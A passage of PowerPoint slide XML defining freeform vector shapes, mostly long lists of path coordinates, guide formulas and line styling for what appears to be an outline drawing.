                    <a:lnTo>
                      <a:pt x="98" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="103"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36285" name="Freeform 17"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4533" y="3117"/>
                <a:ext cx="642" cy="598"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 516 w 642"/>
                  <a:gd name="T1" fmla="*/ 573 h 598"/>
                  <a:gd name="T2" fmla="*/ 521 w 642"/>
                  <a:gd name="T3" fmla="*/ 543 h 598"/>
                  <a:gd name="T4" fmla="*/ 559 w 642"/>
                  <a:gd name="T5" fmla="*/ 542 h 598"/>
                  <a:gd name="T6" fmla="*/ 534 w 642"/>
                  <a:gd name="T7" fmla="*/ 598 h 598"/>
                  <a:gd name="T8" fmla="*/ 480 w 642"/>
                  <a:gd name="T9" fmla="*/ 29 h 598"/>
                  <a:gd name="T10" fmla="*/ 499 w 642"/>
                  <a:gd name="T11" fmla="*/ 61 h 598"/>
                  <a:gd name="T12" fmla="*/ 520 w 642"/>
                  <a:gd name="T13" fmla="*/ 103 h 598"/>
                  <a:gd name="T14" fmla="*/ 548 w 642"/>
                  <a:gd name="T15" fmla="*/ 147 h 598"/>
                  <a:gd name="T16" fmla="*/ 577 w 642"/>
                  <a:gd name="T17" fmla="*/ 182 h 598"/>
                  <a:gd name="T18" fmla="*/ 598 w 642"/>
                  <a:gd name="T19" fmla="*/ 198 h 598"/>
                  <a:gd name="T20" fmla="*/ 624 w 642"/>
                  <a:gd name="T21" fmla="*/ 237 h 598"/>
                  <a:gd name="T22" fmla="*/ 633 w 642"/>
                  <a:gd name="T23" fmla="*/ 277 h 598"/>
                  <a:gd name="T24" fmla="*/ 631 w 642"/>
                  <a:gd name="T25" fmla="*/ 358 h 598"/>
                  <a:gd name="T26" fmla="*/ 600 w 642"/>
                  <a:gd name="T27" fmla="*/ 413 h 598"/>
                  <a:gd name="T28" fmla="*/ 584 w 642"/>
                  <a:gd name="T29" fmla="*/ 471 h 598"/>
                  <a:gd name="T30" fmla="*/ 536 w 642"/>
                  <a:gd name="T31" fmla="*/ 495 h 598"/>
                  <a:gd name="T32" fmla="*/ 511 w 642"/>
                  <a:gd name="T33" fmla="*/ 483 h 598"/>
                  <a:gd name="T34" fmla="*/ 477 w 642"/>
                  <a:gd name="T35" fmla="*/ 495 h 598"/>
                  <a:gd name="T36" fmla="*/ 431 w 642"/>
                  <a:gd name="T37" fmla="*/ 474 h 598"/>
                  <a:gd name="T38" fmla="*/ 408 w 642"/>
                  <a:gd name="T39" fmla="*/ 434 h 598"/>
                  <a:gd name="T40" fmla="*/ 397 w 642"/>
                  <a:gd name="T41" fmla="*/ 406 h 598"/>
                  <a:gd name="T42" fmla="*/ 382 w 642"/>
                  <a:gd name="T43" fmla="*/ 420 h 598"/>
                  <a:gd name="T44" fmla="*/ 397 w 642"/>
                  <a:gd name="T45" fmla="*/ 389 h 598"/>
                  <a:gd name="T46" fmla="*/ 383 w 642"/>
                  <a:gd name="T47" fmla="*/ 396 h 598"/>
                  <a:gd name="T48" fmla="*/ 350 w 642"/>
                  <a:gd name="T49" fmla="*/ 401 h 598"/>
                  <a:gd name="T50" fmla="*/ 333 w 642"/>
                  <a:gd name="T51" fmla="*/ 372 h 598"/>
                  <a:gd name="T52" fmla="*/ 296 w 642"/>
                  <a:gd name="T53" fmla="*/ 359 h 598"/>
                  <a:gd name="T54" fmla="*/ 233 w 642"/>
                  <a:gd name="T55" fmla="*/ 367 h 598"/>
                  <a:gd name="T56" fmla="*/ 177 w 642"/>
                  <a:gd name="T57" fmla="*/ 383 h 598"/>
                  <a:gd name="T58" fmla="*/ 132 w 642"/>
                  <a:gd name="T59" fmla="*/ 399 h 598"/>
                  <a:gd name="T60" fmla="*/ 85 w 642"/>
                  <a:gd name="T61" fmla="*/ 417 h 598"/>
                  <a:gd name="T62" fmla="*/ 32 w 642"/>
                  <a:gd name="T63" fmla="*/ 408 h 598"/>
                  <a:gd name="T64" fmla="*/ 42 w 642"/>
                  <a:gd name="T65" fmla="*/ 361 h 598"/>
                  <a:gd name="T66" fmla="*/ 14 w 642"/>
                  <a:gd name="T67" fmla="*/ 289 h 598"/>
                  <a:gd name="T68" fmla="*/ 6 w 642"/>
                  <a:gd name="T69" fmla="*/ 263 h 598"/>
                  <a:gd name="T70" fmla="*/ 16 w 642"/>
                  <a:gd name="T71" fmla="*/ 258 h 598"/>
                  <a:gd name="T72" fmla="*/ 11 w 642"/>
                  <a:gd name="T73" fmla="*/ 209 h 598"/>
                  <a:gd name="T74" fmla="*/ 18 w 642"/>
                  <a:gd name="T75" fmla="*/ 194 h 598"/>
                  <a:gd name="T76" fmla="*/ 59 w 642"/>
                  <a:gd name="T77" fmla="*/ 163 h 598"/>
                  <a:gd name="T78" fmla="*/ 93 w 642"/>
                  <a:gd name="T79" fmla="*/ 150 h 598"/>
                  <a:gd name="T80" fmla="*/ 135 w 642"/>
                  <a:gd name="T81" fmla="*/ 128 h 598"/>
                  <a:gd name="T82" fmla="*/ 158 w 642"/>
                  <a:gd name="T83" fmla="*/ 97 h 598"/>
                  <a:gd name="T84" fmla="*/ 166 w 642"/>
                  <a:gd name="T85" fmla="*/ 95 h 598"/>
                  <a:gd name="T86" fmla="*/ 180 w 642"/>
                  <a:gd name="T87" fmla="*/ 84 h 598"/>
                  <a:gd name="T88" fmla="*/ 192 w 642"/>
                  <a:gd name="T89" fmla="*/ 64 h 598"/>
                  <a:gd name="T90" fmla="*/ 219 w 642"/>
                  <a:gd name="T91" fmla="*/ 47 h 598"/>
                  <a:gd name="T92" fmla="*/ 243 w 642"/>
                  <a:gd name="T93" fmla="*/ 66 h 598"/>
                  <a:gd name="T94" fmla="*/ 260 w 642"/>
                  <a:gd name="T95" fmla="*/ 59 h 598"/>
                  <a:gd name="T96" fmla="*/ 273 w 642"/>
                  <a:gd name="T97" fmla="*/ 39 h 598"/>
                  <a:gd name="T98" fmla="*/ 293 w 642"/>
                  <a:gd name="T99" fmla="*/ 24 h 598"/>
                  <a:gd name="T100" fmla="*/ 303 w 642"/>
                  <a:gd name="T101" fmla="*/ 11 h 598"/>
                  <a:gd name="T102" fmla="*/ 325 w 642"/>
                  <a:gd name="T103" fmla="*/ 17 h 598"/>
                  <a:gd name="T104" fmla="*/ 363 w 642"/>
                  <a:gd name="T105" fmla="*/ 24 h 598"/>
                  <a:gd name="T106" fmla="*/ 373 w 642"/>
                  <a:gd name="T107" fmla="*/ 33 h 598"/>
                  <a:gd name="T108" fmla="*/ 355 w 642"/>
                  <a:gd name="T109" fmla="*/ 62 h 598"/>
                  <a:gd name="T110" fmla="*/ 387 w 642"/>
                  <a:gd name="T111" fmla="*/ 86 h 598"/>
                  <a:gd name="T112" fmla="*/ 419 w 642"/>
                  <a:gd name="T113" fmla="*/ 109 h 598"/>
                  <a:gd name="T114" fmla="*/ 452 w 642"/>
                  <a:gd name="T115" fmla="*/ 76 h 598"/>
                  <a:gd name="T116" fmla="*/ 453 w 642"/>
                  <a:gd name="T117" fmla="*/ 35 h 598"/>
                  <a:gd name="T118" fmla="*/ 465 w 642"/>
                  <a:gd name="T119" fmla="*/ 0 h 598"/>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642"/>
                  <a:gd name="T181" fmla="*/ 0 h 598"/>
                  <a:gd name="T182" fmla="*/ 642 w 642"/>
                  <a:gd name="T183" fmla="*/ 598 h 598"/>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642" h="598">
                    <a:moveTo>
                      <a:pt x="534" y="598"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="530" y="596"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="591"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="518" y="587"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="580"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="513" y="571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="516" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="506" y="554"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="505" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="502" y="543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="502" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="503" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="529" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="534" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="538" y="544"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="543"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="550" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="555" y="538"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="559" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="559" y="542"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="560" y="550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="560" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="553" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="581"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="537" y="594"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="597"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="534" y="598"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="465" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="469" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="471" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="471" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="475" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="481" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="487" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="497" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="502" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="506" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="523" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="526" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="528" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="538" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="545" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="566" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="564" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="566" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="574" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="577" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="579" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="585" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="592" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="597" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="605" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="616" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="623" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="632" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="634" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="633" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="638" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="642" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="639" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="323"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="633" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="634" y="344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="633" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="621" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="605" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="419"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="596" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="592" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="465"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="584" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="474"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="565" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="559" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="555" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="491"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="537" y="492"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="495"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="533" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="529" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="527" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="529" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="506" y="479"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="503" y="479"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="500" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="497" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="503" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="496" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="497"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="481" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="495"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="470" y="491"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="486"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="442" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="438" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="474"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="454"/>
                    </a:lnTo>
